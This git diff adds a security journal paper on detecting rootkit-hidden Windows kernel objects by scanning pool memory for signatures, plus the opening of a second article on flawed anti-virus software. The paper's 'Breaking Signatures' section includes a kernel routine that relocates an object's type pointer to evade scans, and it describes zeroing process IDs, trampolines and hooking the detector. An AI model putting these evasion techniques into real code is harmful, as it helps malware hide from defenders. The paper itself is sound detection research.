evolve and become more advanced, methods that can be +used to detect hidden objects must also evolve. For example, relying on system +provided APIs to enumerate maintained lists is no longer enough to provide +effective cross-view detection. To that point, scanning virtual memory for +object signatures has been shown to provide useful, but limited, results. The +following paper outlines the theory and practice behind scanning memory for +hidden objects. This method relies upon the ability to safely reference the +Windows system virtual address space and also depends upon the building and +locating effective memory signatures. Using this method as a base, suggestions +are made as to what actions might be performed once objects are detected. The +paper also provides a simple example of how object-independent signatures can be +built and used to detect several different kernel objects on all versions of +Windows NT+. Due to time constraints, the source code associated with this +paper will be made publicly available in the near future. + +Thanks: + +Thanks to skape, Peter, and the rest of the uninformed hooligans; +you guys and gals rock! + +Disclaimer: + +The author is not responsible for how the papers contents are used +or interpreted. Some information may be inaccurate or incorrect. If +the reader feels any information is incorrect or has not been +properly credited please contact the author so corrections can be +made. All content refers to the Windows XP Service Pack 2 +platform unless otherwise noted. + + +2) Introduction + +As rootkits become increasingly popular and more sophisticated than +ever before, detection methods must also evolve. While rootkit +technologies have evolved beyond API hooking methods, detectors have +also evolved beyond the hook detection ages. At first +rootkits such as FU were detected using various methods +which exploited its weak and proof-of-concept design by applications +such as Blacklight. These specific weaknesses were +addressed in FUTo. However, some still remain excluding +the topic of this paper. + +RAIDE, a rootkit detection tool, uses a memory +signature scanning method in order to find EPROCESS blocks hidden by +FUTo. This specific implementation works, however, it too has its +weaknesses. This paper attempts to outline the general concepts of +implementing a successful rootkit detection method using memory +signatures. 
+ +The following chapters will discuss how to safely enumerate system +memory, what to look for when building a memory signature, what to +do once a memory signature has been found, and potential methods of +breaking memory signatures. Finally, an accompanying tool will be used +to concretely illustrate the subject of this paper. + +After reading the following paper, the reader should have an +understanding of the concepts and issues related to kernel object +detection using memory signatures. The author believes this to be an +acceptable method of rootkit detection. However, as with most things +in the security realm, no one technique is the ultimate solution and +this technique should only be considered complimentary to other known +detection methods. + + +3) Scanning Memory + +Enumerating arbitrary system memory is nowhere near a science since +its state can change at anytime while you are attempting to access +it. While this is true, the memory that surrounds kernel executive +objects should be fairly consistent. With proper care, memory accesses +should be safe and the chance of false positives and negatives should be +fairly minimal. The following sections will outline a safe method to +enumerate the contents of both the system's PagedPool and +NonPagedPool. + +3.1) Retrieving Pool Ranges + +For the purpose of enumerating pool memory it is unnecessary to +enumerate the entire system address space. The system maintains a +few global variables such as nt!MmPagedPoolStart, +nt!MmPagedPoolEnd and related NonPagedPool +variables that can be used in order to speed up a search and reduce +the possibility of unnecessary false positives. Although these +global variables are not exported, there are a couple ways in that +they can be obtained. + +The most reliable method on modern systems (Windows XP Service Pack 2 +and up) is through the use of the KPCR->KdVersionBlock pointer located +at fs:[0x34]. This points to a KDDEBUGGER_DATA64 structure which is +defined in the Debugging Tools For Windows SDK header file wdbgexts.h. +This structure is commonly used by malicious software in order to gain +access to non-exported global variables to manipulate the system. + +A second method to obtain PagedPool values is to reference the +per-session nt!_MM_SESSION_SPACE found at EPROCESS->Session. This contains +information about the session owning the process, including its ranges +and many other PagedPool related values shown here. + +kd> dt nt!_MM_SESSION_SPACE + +0x01c NonPagedPoolBytes : Uint4B + +0x020 PagedPoolBytes : Uint4B + +0x024 NonPagedPoolAllocations : Uint4B + +0x028 PagedPoolAllocations : Uint4B + +0x044 PagedPoolMutex : _FAST_MUTEX + +0x064 PagedPoolStart : Ptr32 Void + +0x068 PagedPoolEnd : Ptr32 Void + +0x06c PagedPoolBasePde : Ptr32 _MMPTE + +0x070 PagedPoolInfo : _MM_PAGED_POOL_INFO + +0x244 PagedPool : _POOL_DESCRIPTOR + +While enumerating the entire system address space is not preferable, it +can still be used in situations where pool information cannot be +obtained. The start of the system address space can be assumed to be +any address above nt!MmHighestUserAddress. However, it would appear +that an even safer assumption would be the address following the +LARGE_PAGE where ntoskrnl.exe and hal.dll are mapped. This can be +obtained by using any address exported by hal.dll and rounding up to the +nearest large page. + + +3.2) Locking Memory + +When accessing arbitrary memory locations, it is important that pages be +locked in memory prior to accessing them. 
This is done to ensure that +accessing the page can be done safely and will not cause an exception +due to a race condition, such as if it were to be de-allocated between a +check and a reference. The system provides a routine to lock pages +named nt!MmProbeAndLockPages. This routine can be used to lock either +pagable or non-paged memory. Since physical pages maintain a reference +count in the nt!MmPfnDatabase there is no worry of an outside source +unlocking the pages and having them page out to disk or become invalid. + +In order to use MmProbeAndLockPages, a caller must first build an MDL +structure using something such as nt!IoAllocateMdl or +nt!MmInitializeMdl. The MDL creation routines are passed a virtual +address and length describing the block of virtual memory to be +referenced. On a successful call to nt!MmProbeAndLockPages, the virtual +address range described by the MDL structure is safe to access. Once the +block is no longer needed to be accessed, the pages must be unlocked +using nt!MmUnlockPages. + +A trick can be used to further reduce the number of pages locked when +enumerating the NonPagedPool. As documented, MmProbeAndLockPages can be +called at DISPATCH_LEVEL with the limitation of it only being allowed to +lock resident memory pages and failing otherwise, which is a desirable +side-effect in this case. + + +4) Detecting Executive Objects + +In general, all of the executive components of the NT kernel rely on the +object manager in order to manage the objects they allocate. All objects +allocated by the object manager have a common header named OBJECT_HEADER +and additional optional headers such as OBJECT_HEADER_NAME_INFO, process +quota information, and handle trace information. Let's take a look to +see what is common to all executive objects and how we can use the pool +block header information to identify an allocated executive object. +Lastly, some object specific information will be discussed in terms of +generating a useful memory signature for an object. + +4.1) Generic Object Information + +Since the OBJECT_HEADER is common to all objects, let's look at it in +detail. A static field here refers to all objects of specific type, not +all executive objects in the system. 
+

kd> dt _OBJECT_HEADER
   +0x000 PointerCount       : Int4B
   +0x004 HandleCount        : Int4B
   +0x004 NextToFree         : Ptr32 Void
   +0x008 Type               : Ptr32 _OBJECT_TYPE
   +0x00c NameInfoOffset     : UChar
   +0x00d HandleInfoOffset   : UChar
   +0x00e QuotaInfoOffset    : UChar
   +0x00f Flags              : UChar
   +0x010 ObjectCreateInfo   : Ptr32 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged  : Ptr32 Void
   +0x014 SecurityDescriptor : Ptr32 Void
   +0x018 Body               : _QUAD

 -------------------+------------+-------------------------------------
 PointerCount       | Variable   | Number of references
 HandleCount        | Variable   | Number of open handles
 NextToFree         | NotValid   | Used when freed
 Type               | Static     | Pointer to OBJECT_TYPE
 NameInfoOffset     | Static     | 0 or offset to related header
 HandleInfoOffset   | Static     | 0 or offset to related header
 QuotaInfoOffset    | Static     | 0 or offset to related header
 Flags              | NotCertain | Not certain
 ObjectCreateInfo   | Variable   | Pointer to OBJECT_CREATE_INFORMATION
 QuotaBlockCharged  | NotCertain | Not certain
 SecurityDescriptor | Variable   | Pointer to SECURITY_DESCRIPTOR
 Body               | NotValid   | Union with the actual object
 -------------------+------------+-------------------------------------

From this it is assumed that the most reliable and unique signature is
the Type field of the OBJECT_HEADER, which can be used to identify
objects of a specific type such as EPROCESS, ETHREAD, DRIVER_OBJECT,
and DEVICE_OBJECT.


4.2) Validating Pool Block Information

Kernel pool management appears to be slightly different from usermode
heap management. However, if one assumes that the only concern is
dealing with pool memory allocations which are less than PAGE_SIZE, it
is fairly similar. Each call to ExAllocatePoolWithTag() returns a
pre-buffer header as follows:

kd> dt _POOL_HEADER
   +0x000 PreviousSize            : Pos 0, 9 Bits
   +0x000 PoolIndex               : Pos 9, 7 Bits
   +0x002 BlockSize               : Pos 0, 9 Bits
   +0x002 PoolType                : Pos 9, 7 Bits
   +0x000 Ulong1                  : Uint4B
   +0x004 ProcessBilled           : Ptr32 _EPROCESS
   +0x004 PoolTag                 : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash             : Uint2B

For the purposes of locating objects, the following is a breakdown of
what could be useful. Again, static refers to fields common between
similar executive objects and not all allocated POOL_HEADER structures.

 ------------------------+------------+----------------------------------
 PreviousSize            | Variable   | Offset to previous pool block
 PoolIndex               | NotCertain | Not certain
 BlockSize               | Static     | Size of pool block
 PoolType                | Static     | POOL_TYPE
 Ulong1                  | Union      | Padding, not valid
 ProcessBilled           | Variable   | Allocator EPROCESS when no Tag specified
 PoolTag                 | Static     | Pool Tag (ULONG)
 AllocatorBackTraceIndex | NotCertain | Not certain
 PoolTagHash             | NotCertain | Not certain
 ------------------------+------------+----------------------------------

The POOL_HEADER contains several fields, such as BlockSize, PoolType,
and PoolTag, that appear to be common to similar objects and can be
used to further verify the likelihood of having located an object of a
specific type.

In addition to the mentioned static fields, two other fields,
PreviousSize and BlockSize, can be used to validate that the currently
assumed POOL_HEADER appears to be a valid, allocated pool block and is
in one of the pool manager's maintained linked lists. PreviousSize and
BlockSize are multiples of the minimum pool alignment, which is 8 bytes
on a 32-bit system and 16 bytes on a 64-bit system.
These two elements supply byte offsets to the +neighboring pool blocks. + +If PreviousSize equals 0, the current POOL_HEADER should be the first +pool block in the pool's contiguous allocations. If it is not, it +should be the same as the previous POOL_HEADERs BlockSize. The +BlockSize should never equal 0 and should always be the same as the +proceeding POOL_HEADERs PreviousSize. + +The following code validates a POOL_HEADER of an allocated pool block. + +// +// Assumes BlockOffset < PAGE_SIZE +// ASSERTS Flink == Flink->Blink && Blink == Blink->Flink +// +BOOLEAN ValidatePoolBlock ( + IN PPOOL_HEADER pPoolHdr, + IN VALIDATE_ADDR pValidator +) { + BOOLEAN bReturn = FALSE; + + PPOOL_HEADER pPrev; + PPOOL_HEADER pNext; + + pPrev = (PPOOL_HEADER)((PUCHAR)pPoolHdr + - (pPoolHdr->PreviousSize * sizeof(POOL_HEADER))); + pNext = (PPOOL_HEADER)((PUCHAR)pPoolHdr + + (pPoolHdr->BlockSize * sizeof(POOL_HEADER))); + + if + (( + ( pPoolHdr == pNext ) + ||( pValidator( pNext + sizeof(POOL_HEADER) - 1 ) + && pPoolHdr->BlockSize == pNext->PreviousSize ) + ) + && + ( + ( pPoolHdr != pPrev ) + ||( pValidator( pPrev ) + && pPoolHdr->PreviousSize == pPrev->BlockSize ) + )) + { + bReturn = TRUE; + } + + return bReturn; +} + + +4.3) Object Specific Signatures + +So far a few useful signatures have been shown which apply to all +executive objects and could be used to identify them in memory. For some +cases these may be enough to be effective. However, in other cases, it +may be necessary to examine information within the object's body itself +in order to identify them. It should be noted that some objects of +interest may be clearly defined and documented while others may not be. +Furthermore, executive object definitions may vary between OS versions. +The following subsections briefly outline obvious memory signatures for +a few objects which generally are of interest when identifying +rootkit-like behavior. A few examples of object-specific signatures +will also be discussed, some of which have been used in previous work. + +4.3.1) Process Objects + +Here are just a few of the most basic EPROCESS fields which can form a +simple signature using rather predictable constant values which hold +true for all EPROCESS structures in the same system. + + -----------------------------+------------------------------------------ + Pcb.Header.Type | Dispatch header type number + Pcb.Header.Size | Size of dispatcher object + Pcb.Affinity | CPU affinity bit mask, typically CPU in system + Pcb.BasePriority | Typically the default of 8 + Pcb.ThreadQuantum | Workstations is typically 18 + ExitTime | 0 for running processes + UniqueProcessId | 0 if bitwise AND with 0xFFFF0002 + SectionBaseAddress | Typically 0x00400000 for non-system executables + InheritedFromUniqueProcessId | Same as UniqueProcessId, typically a valid running pid + Session | Unique on a per-session basis + ImageFileName | Printable ASCII, typically ending in '.exe' + Peb | 0x7FF00000 if bitwise AND with 0xFFF00FFF + SubSystemVersion | XP Service Pack 2 is 0x400 + -----------------------------+------------------------------------------ + +Note that there are several other DISPATCH_HEADERs embedded within +locks, events, timers, etc in the structure which also have a predicable +Header.Type and Header.Size. + +4.3.2) Thread Objects + +Here are just a few of the most basic ETHREAD fields which can form a +simple signature using rather predictable constant values which hold +true for all ETHREAD structures in the same system. 
+ + + ------------------+------------------------------------------------------ + Tcb.Header.Type | Dispatch header type number + Tcb.Header.Size | Size of dispatcher object + Teb | 0x7FF00000 if bitwise AND with 0xFFF00FFF + BasePriority | Typically the default of 8 + ServiceTable | nt!KeServiceDescriptorTable(Shadow) used by RAIDE + Affinity | CPU affinity bit mask, typically CPU in system + PreviousMode | 0 or 1, which is KernelMode or UserMode + Cid.UniqueProcess | 0 if bitwise AND with 0xFFFF0002 + Cid.UniqueThread | 0 if bitwise AND with 0xFFFF0002 + ------------------+------------------------------------------------------ + +Note that there are several other DISPATCH_HEADERs embedded within +locks, events, timers, etc in the structure which also have a predicable +Header.Type and Header.Size. + + +4.3.3) Driver Objects + +A tool written previously named MODGREPPER by Joanna Rutkowska of +invisiblethings.org used a signature based approach to detect hidden +DRIVER_OBJECTs. This signature was later 'broken' by valerino described +in a rootkit.com article titled "Please don't greap me!". Listed here +are a few fields which a signature could be built upon to detect +DRIVER_OBJECTs. + + --------------+----------------------------------------------------------- + Type | I/O Subsystem structure type ID, should be 4 + Size | Size of the structure, should be 0x168 + DeviceObject | Pointer to a valid first created device object(can be NULL) + DriverSection | Pointer to a nt!_LDR_DATA_TABLE_ENTRY structure + DriverName | A UNICODE_STRING structure containing the driver name + --------------+----------------------------------------------------------- + + +The following fields of the DRIVER_OBJECT can be validated by assuring +they fall within the range of a loaded driver image such that: + + +DriverStart < FIELD < DriverStart + DriverSize. + + + --------------------+---------------------------------------------------- + DriverInit | Address of DriverEntry() function + DriverUnload | Address of DriverUnload() function, can be NULL + MajorFunction[0x1c] | Dispatch handlers for IRPMJXXX, can default to ntoskrnl.exe + --------------------+---------------------------------------------------- + + +4.3.4) Device Objects + +For the DEVICE_OBJECT structure there are few static +signatures which are usable. Here are the only obvious ones. + + + -------------+---------------------------------------------------------- + Type | I/O Subsystem structure type ID, should be 3 + Size | Size of the structure, should be 0xb8 + DriverObject | Pointer to a valid driver object + -------------+---------------------------------------------------------- + +Note that the DriverObject field must be valid in order for the device +to function. + +4.3.5) Miscellaneous + +So far the memory signatures discussed have been fairly straightforward +and for the most part are simply a binary comparison with a specific +value. Later in this paper, a technique called N-depth pointer +validation will be discussed as a method of developing a more effective +signature in situations where pointer based memory signatures are +attempted to be evaded. + +Another way of considering an object field as a signature is to validate +it in terms of its characteristics instead of by its value. A common +example of this would be to validate an object field LIST_ENTRY. +Validating a LIST_ENTRY structure can be done as follows: + + +Entry == Entry->Flink->Blink == Entry->Blink->Flink. 
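To make this concrete, the following is a minimal sketch (it is not
part of the accompanying tool) of how such a check might be wrapped,
reusing the VALIDATE_ADDR callback style of the ValidatePoolBlock
function shown earlier. It assumes the LIST_ENTRY itself has already
been validated as readable and only verifies that both neighbors point
back at it.

//
// Returns TRUE when both links of a LIST_ENTRY reference readable
// memory and both neighbors point back at the entry, i.e.
// Entry == Entry->Flink->Blink == Entry->Blink->Flink.
//
BOOLEAN ValidateListEntry (
    IN PLIST_ENTRY pEntry,
    IN VALIDATE_ADDR pValidator
) {
    // Both links must reference memory that is safe to read.
    if( ! pValidator( pEntry->Flink ) || ! pValidator( pEntry->Blink ) )
        return FALSE;

    // Both neighbors must point back at this entry.
    if( pEntry->Flink->Blink != pEntry || pEntry->Blink->Flink != pEntry )
        return FALSE;

    return TRUE;
}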
+

A pointer to any object or memory allocation can also be checked using
the function shown previously, named ValidatePoolBlock. Even a
UNICODE_STRING.Buffer can be validated this way, provided the
allocation is less than PAGE_SIZE.


5) Found An Object, Now What?

The question of what to do after potentially identifying an executive
object through a signature depends on what the underlying goal is. For
the purpose of the sample utility included with this paper, the goal
may be to simply display some information about the objects as it
finds them.

In the context of a rootkit detector, however, there may be many more
steps that need to be taken. For example, consider a detector looking
for EPROCESS blocks which have been unlinked from the process linked
list or a driver module hidden from the system service API. In order
to determine this, a cross-view comparison of the raw objects detected
against the output of an API call or a list enumeration is needed.
Detectors must also take into consideration the race condition of an
object being created or destroyed in between the memory enumeration
and the acquisition of the "known to the system" data.

Additionally, it may be desirable to perform some sanity checks on
these objects beyond the signature match. Do the object fields x, y, z
contain valid pointers? Is field c equal to b? Does this object appear
to be valid but show signs of tampering intended to hide it? Does the
number of detected objects match up with a global count value such as
the one maintained in an OBJECT_TYPE structure? The following sections
briefly mention some thoughts on what to do with a suspected object of
the four types previously discussed in Chapter 4.


5.1) Process Objects

Here is a brief list of things to check when scanning for EPROCESS
objects.

 1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
 2. Compare against a system call such as nt!NtQuerySystemInformation.
 3. Compare against the EPROCESS->ActiveProcessLinks list.
 4. Does the process have a valid list of threads?
 5. Can PsLookupProcessByProcessId open its UniqueProcessId?
 6. Is ImageFileName a valid string? zeroed? garbage?

5.2) Thread Objects

Here is a brief list of things to check when scanning for ETHREAD
objects.

 1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
 2. Compare against a system call such as nt!NtQuerySystemInformation.
 3. Does the thread have a valid owning process?
 4. Can PsLookupThreadByThreadId open its Cid.UniqueThread?
 5. What does Win32StartAddress point to? Is it a valid module address?
 6. What is its ServiceTable value?
 7. If it is in a wait state, for how long?
 8. Where is its stack? What does its stack trace look like?


5.3) Driver Objects

Here is a brief list of things to check when scanning for DRIVER_OBJECT
objects.

 1. Compare against services found in the service control manager database.
 2. Compare against a system call such as nt!NtQuerySystemInformation.
 3. Is the object in the global system namespace?
 4. Does the driver own any valid device objects?
 5. Does the driver base address point to a valid MZ header?
 6. Do the object's function pointer fields look correct? (A sketch of
    this check follows this list.)
 7. Does DriverSection point to a valid nt!_LDR_DATA_TABLE_ENTRY?
 8. Does DriverName or the LDR_DATA_TABLE_ENTRY have valid strings?
    zeroed? garbage?
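The sketch referenced above for the function-pointer check (it is not
part of the GrepExec source) simply ranges the entry point and unload
handler of a suspect DRIVER_OBJECT against the loaded driver image,
following the DriverStart < FIELD < DriverStart + DriverSize rule from
the earlier DRIVER_OBJECT signature section.

//
// Returns TRUE when DriverInit (and DriverUnload, when present) fall
// inside the image described by DriverStart and DriverSize. A sketch
// only; it assumes the DRIVER_OBJECT itself is already known to be
// readable.
//
BOOLEAN ValidateDriverImageRange (
    IN PDRIVER_OBJECT pDriver
) {
    ULONG_PTR imageStart = (ULONG_PTR)pDriver->DriverStart;
    ULONG_PTR imageEnd   = imageStart + pDriver->DriverSize;

    // DriverEntry() must live inside the driver image.
    if( (ULONG_PTR)pDriver->DriverInit < imageStart ||
        (ULONG_PTR)pDriver->DriverInit >= imageEnd )
        return FALSE;

    // DriverUnload() is optional, but when present it should also
    // fall inside the image.
    if( pDriver->DriverUnload != NULL &&
        ( (ULONG_PTR)pDriver->DriverUnload < imageStart ||
          (ULONG_PTR)pDriver->DriverUnload >= imageEnd ) )
        return FALSE;

    return TRUE;
}

The MajorFunction dispatch table can be ranged in the same way, keeping
in mind that unused entries may legitimately point into ntoskrnl.exe.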
+

5.4) Device Objects

Here is a brief list of things to check when scanning for DEVICE_OBJECT
objects.

 1. Is the owning driver object valid?
 2. Is the device named and is it mapped into the global namespace?
 3. Does it appear to be in a valid device stack?
 4. Are its Type and Size fields correct?


6) Breaking Signatures

Memory signatures can be an effective method of identifying allocated
objects and can serve as a low level baseline in order to detect
objects hidden by several different methods. Although the memory
signature detection method may be effective, it doesn't come without
its own set of problems. Many signatures can be evaded using several
different techniques, and non-evadable signatures for objects, if any
exist, have yet to be explored. The following sections discuss issues
and countermeasures related to defeating memory signatures.


6.1) Pointer Based Signatures

Using a memory signature which is a valid pointer to some common
object or static data is very appealing for detection due to its
reliability; however, it is also an easy signature to bypass. The
following demonstrates the most simplistic method of bypassing the
OBJECT_HEADER->Type signature this paper uses as a generic object
memory signature. This is possible because the OBJECT_TYPE is just an
allocated structure of fairly stable data. Many pointer based
signatures with similar static characteristics are open to the same
attack.


NTSTATUS KillObjectTypeSignature (
    IN PVOID Object
)
{
    PVOID pDummyObject;
    POBJECT_HEADER pHdr;

    pHdr = OBJECT_TO_OBJECT_HEADER( Object );

    // Relocate a private copy of the OBJECT_TYPE and repoint the
    // object's header at it, breaking any signature built on the
    // original OBJECT_TYPE pointer.
    pDummyObject = ExAllocatePool( NonPagedPool, sizeof(OBJECT_TYPE) );

    if( pDummyObject == NULL )
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) );

    pHdr->Type = pDummyObject;

    return STATUS_SUCCESS;
}


6.2) N-Depth Pointer Validation

As demonstrated in the previous section, pointer based signatures are
effective. However, in some cases, they may be trivial to bypass. The
following code demonstrates an example of what this paper refers to as
N-depth pointer validation, in an attempt to create a more complex,
and potentially more difficult to bypass, signature using pointers.
The following example is also evadable using the same principle of
relocation shown above.

The algorithm assumes a given address is an executive object and
attempts validation by performing the following steps:

 1. Calculates an assumed OBJECT_HEADER
 2. Assumes pObjectHeader->Type is an OBJECT_TYPE
 3. Calculates an assumed OBJECT_HEADER for the OBJECT_TYPE
 4. Assumes pObjectHeader->Type is nt!ObpTypeObjectType
 5. Validates pTypeObject->TypeInfo.DeleteProcedure == nt!ObpDeleteObjectType


BOOLEAN ValidateNDepthPtrSignature (
    IN PVOID Address,
    IN VALIDATE_ADDR pValidate
)
{
    POBJECT_TYPE pTypeObject;
    POBJECT_HEADER pHdr;

    pHdr = OBJECT_TO_OBJECT_HEADER( Address );

    if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;

    // Assume this is the OBJECT_TYPE for this assumed object
    pTypeObject = pHdr->Type;

    // OBJECT_TYPEs have headers too
    pHdr = OBJECT_TO_OBJECT_HEADER( pTypeObject );

    if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;

    // OBJECT_TYPEs have an OBJECT_TYPE of nt!ObpTypeObjectType
    pTypeObject = pHdr->Type;

    if( !
pValidate(&pTypeObject->TypeInfo.DeleteProcedure) ) return FALSE; + + // \ObjectTypes\Type has a DeleteProcedure of nt!ObpDeleteObjectType + if( pTypeObject->TypeInfo.DeleteProcedure + != nt!ObpDeleteObjectType ) return FALSE; + + return TRUE; +} + + +6.3) Miscellaneous + +An obvious method of preventing detection from memory scanning would be +to use what is commonly referred to as the Shadow Walker memory +subversion technique. If virtual memory is unable to be read then of +course a memory scan will skip over this area of memory. In the context +of pool memory, however, this may not be an easy attack since it may +create a situation where the pool appears corrupted which could lead to +crashes or system bugchecks. Of course, attacking a function like +nt!MmProbeAndLockPages or IoAllocateMdl globally or specifically in the +import address table of the detector itself would work. + +For memory signatures based on constant or predicable values it may be +feasible to either zero out or change these fields and not disturb +system operation. For example take the author's enhancements to the FUTo +rootkit where it is seen that the EPROCESS->UniqueProcessId can be +safely cleared to 0 or previously mentioned rootkit.com article titled +"Please don't greap me!" which clears DRIVER_OBJECT->DriverName and its +associated buffer in order to defeat MODGREPPER. + +For the case of some pointer signatures a simple binary comparison may +not be enough to validate it. Take the above example and using +nt!ObpDeleteObjectType. This could be defeated by overwriting +pTypeObject->TypeInfo.DeleteProcedure to point to a simple jump +trampoline which is allocated elsewhere which simple jumps back to +nt!ObpDeleteObjectType. + + +7) GrepExec: The Tool + +Included with this paper is a proof-of-concept tool complete with source +which demonstrates scanning the pool for signatures to detect executable +objects. Objects detected are DRIVER_OBJECT, DEVICE_OBJECT, EPROCESS, +and ETHREAD. The tool does nothing to determine if an object has been +attempted to be hidden in any way. Instead, it simply displays found +objects to standard output. At this time the author has no plans to +continue work with this specific tool, however, there are plans to +integrate the memory scanning technique into another project. The source +code for the tool can be easily modified to detect other signatures +and/or other objects. + +7.1) The Signature + +For demonstration purposes the signature used is simple. All objects are +allocated in NonPagedPool so only non-paged memory is enumerated for the +search. The signature is detected as follows: + + 1. Enumeration is performed by assuming the start of a pool block. + 2. The signature offset is added to this pointer. + 3. The assumed signature is compared with the OBJECT_HEADER->Type + for the object type being searched for. + 4. The assumed POOL_HEADER->PoolType is compared to the objects known + pool type. + 5. The assumed POOL_HEADER is validated using the function + from section , ValidatePoolBlock. + + +The following is the function which sets up the parameters in order to +perform the pool enumeration and validation of a block by a single PVOID +signature. On a match, a callback is made using the pointer to the start +of the matching block. As an alternative to the PVOID signature, the +poolgrep.c code can easily be modified to accept either a structure to +several signatures and offsets or a validation function pointer in order +to perform a more complex signature validation. 
+ + +NTSTATUS ScanPoolForExecutiveObjectByType ( + IN PVOID Object, + IN FOUND_BLOCK_CB Callback, + IN PVOID CallbackContext +) { + NTSTATUS ntStatus = STATUS_SUCCESS; + POBJECT_HEADER pObjHdr; + PPOOL_HEADER pPoolHdr; + ULONG_PTR blockSigOffset; + ULONG_PTR blockSignature; + + pObjHdr = OBJECT_TO_OBJECT_HEADER( Object ); + pPoolHdr = OBJHDR_TO_POOL_HEADER( pObjHdr ); + blockSigOffset = (ULONG_PTR)&pObjHdr->Type - (ULONG_PTR)pObjHdr + + OBJHDR_TO_POOL_BLOCK_OFFSET(pObjHdr); + blockSignature = (ULONG_PTR)pObjHdr->Type; + + (VOID)ScanPoolForBlockBySignature( pPoolHdr->PoolType - 1, + 0, // pPoolHdr->PoolTag OPTIONAL, + blockSigOffset, + blockSignature, + Callback, + CallbackContext ); + return ntStatus; +} + + +7.2) Usage + +GrepExec usage is pretty straightforward. Here is the output of the +help command. + +********************************************************** + GREPEXEC 0.1 * Grepping executive objects from the pool * + Author: bugcheck + Built on: May 30 2006 +********************************************************** + +Usage: grepexec.exe [options] + + --help, -h Displays this information + --install, -i Manually install driver + --uninstall, -u Manually uninstall driver + --status, -s Display installation status + --process, -p GREP process objects + --thread, -t GREP thread objects + --driver, -d GREP driver objects + --device, -e GREP device objects + + +7.3) Sample Output + +The standard output is also straight forward. Here is a sample of each +supported command. + +C:\grepexec>grepexec.exe -p +EPROCESS=81736C88 CID=0354 NAME: svchost.exe +EPROCESS=8174E238 CID=0634 NAME: explorer.exe +EPROCESS=81792020 CID=027c NAME: winlogon.exe +... + +C:\grepexec>grepexec.exe -t +EPROCESS=817993C0 ETHREAD=815D4A58 CID=0778.077c wscntfy.exe +EPROCESS=8174AA88 ETHREAD=815D6860 CID=0408.0678 svchost.exe +EPROCESS=819CA830 ETHREAD=815F3B30 CID=0004.0368 System +EPROCESS=81792020 ETHREAD=81600398 CID=027c.0460 winlogon.exe +... + +C:\grepexec>grepexec.exe -d +DRIVER=81722DA0 BASE=F9B5C000 \FileSystem\NetBIOS +DRIVER=819A4B50 BASE=F983D000 \Driver\Ftdisk +DRIVER=81725DA0 BASE=00000000 \Driver\Win32k +DRIVER=81771880 BASE=F9EB4000 \Driver\Beep + ... + +C:\grepexec>grepexec.exe -e +DEVICE=81733860 \Driver\IpNat NAME: IPNAT +DEVICE=81738958 \Driver\Tcpip NAME: Udp +DEVICE=817394B8 \Driver\Tcpip NAME: RawIp +DEVICE=81637CE0 \FileSystem\Srv NAME: LanmanServer +... + + +8) Conclusion + +From reading this paper the reader should have a good understanding of +the concepts and issues related to scanning memory for signatures in +order to detect objects in the system pool. The reader should be able +to enumerate system memory safely, construct their own customized memory +signatures, locate signatures in memory, and implement their own +reporting mechanism. + +It is obvious that object detection using memory scanning is no exact +science. However, it does provide a method which, for the most part, +interacts with the system as little as possible. The +author believes that the outlined technique can be successfully +implemented to obtain acceptable results in detecting objects hidden by +rootkits. + + +Bibliography + +Blackhat.com. RAIDE: Rootkit Analysis Identification Elimination. +http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Silberman-Butler.pdf; +Accessed May. 30, 2006. + +F-Secure. Blacklight. +http://www.f-secure.com/blacklight/; +Accessed May. 30, 2006. + +Invisiblethings.org. MODGREPPER. +http://www.invisiblethings.org/tools.html; +Accessed May. 30, 2006. + +Phrack.org. 
Shadow Walker. +http://www.phrack.org/phrack/63/p63-0x08_Raising_The_Bar_For_Windows_Rootkit_Detection.txt; +Accessed May. 30, 2006. + +Rootkit.com. FU. +http://rootkit.com/project.php?id=12; +Accessed May. 30, 2006. + +Rootkit.com. Please don't greap me!. +http://rootkit.com/newsread.php?newsid=316; +Accessed May. 30, 2006. + +Uninformed.org. futo. +http://uninformed.org/?v=3&a=7&t=sumry; +Accessed May. 30, 2006. + +Windows Hardware Developer Central. Debugging Tools for Windows. +http://www.microsoft.com/whdc/devtools/debugging/default.mspx; +Accessed May. 30, 2006. diff --git a/uninformed/4.8.txt b/uninformed/4.8.txt new file mode 100644 index 0000000..cd85455 --- /dev/null +++ b/uninformed/4.8.txt @@ -0,0 +1,2070 @@ +What Were They Thinking? +Anti-Virus Software Gone Wrong +Skywing +skywing@valhallalegends.com + +0. Foreword + +Abstract: Anti-virus software is becoming more and more prevalent on end-user +computers today. Many major computer vendors (such as Dell) bundle anti-virus +software and other personal security suites in the default configuration of +newly-sold computer systems. As a result, it is becoming increasingly important +that anti-virus software be well-designed, secure by default, and interoperable +with third-party applications. Software that is installed and running by +default constitutes a prime target for attack and, as such, it is especially +important that said software be designed with security and interoperability in +mind. In particular, this article provides examples of issues found in +well-known anti-virus products. These issues range from not properly validating +input from an untrusted source (especially within the context of a kernel +driver) to failing to conform to API contracts when hooking or implementing an +intermediary between applications and the underlying APIs upon which they rely. +For popular software, or software that is installed by default, errors of this +sort can become a serious problem to both system stability and security. Beyond +that, it can impact the ability of independent software vendors to deploy +functioning software on end-user systems. + +1. Introduction + +In today's computing environment, computer security is becoming a more and more +important role. The Internet poses unique dangers to networked computers, as +threats such as viruses, worms, and other malicious software become more and +more common. + +As a result, there has been a shift towards including personal security +software on most new computers sold today, such as firewall software and +anti-virus software. Many new computers are operated and administered by +individuals who are not experienced or savvy with the administration of a +secure system, and as such rely solely on the protection provided by a firewall +or anti-virus security suite. + +Given this, one would expect that firewall, anti-virus, and other personal +security software would be high quality - after all, for many individuals, +firewall and anti-virus software are the first (and all-too-often only) line +of defense. + +Unfortunately, though, most common anti-virus and personal firewall software is +full of defects that can at best make it very difficult to interoperate with +(which turns out to be a serious problem for most software vendors, given how +common anti-virus and firewall software is), and at worst compromise the very +system security they advertise to protect. 
